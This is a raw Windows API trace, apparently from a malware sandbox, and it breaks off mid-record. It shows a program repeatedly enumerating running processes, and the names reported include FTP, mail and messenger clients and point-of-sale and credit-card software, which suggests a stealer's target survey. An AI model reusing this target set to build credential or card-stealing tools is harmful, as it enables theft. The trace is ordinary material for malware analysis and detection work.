Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0218.577] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0218.578] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0218.579] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0218.581] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0218.582] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0218.584] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0218.585] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0218.587] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0218.589] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0218.590] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0218.592] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0218.594] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0218.595] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0218.597] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0218.598] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0218.600] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0218.602] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0218.603] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0218.605] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0218.607] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0218.608] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0218.610] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0218.611] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0218.613] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0218.614] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0218.616] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0218.617] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0218.619] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0218.670] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0218.671] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0218.673] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0218.675] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0218.676] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0218.678] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0218.679] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0218.681] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0218.682] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0218.684] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0218.685] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0218.687] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0218.688] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0218.690] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0218.691] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0218.692] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0218.694] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0218.695] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.697] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.698] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.700] Process32Next (in: hSnapshot=0x2268, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0218.701] CloseHandle (hObject=0x2268) returned 1 [0218.701] Sleep (dwMilliseconds=0x64) [0218.914] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0218.923] Process32First (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.925] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.926] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.927] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.929] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.930] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.931] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.934] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.935] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.937] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.938] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.939] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.941] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.942] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.943] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.945] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.946] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.947] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.360] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.361] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.362] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0219.364] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0219.366] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.372] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.373] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0219.375] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0219.377] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0219.378] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0219.379] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.381] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0219.382] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0219.383] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.385] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0219.387] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, 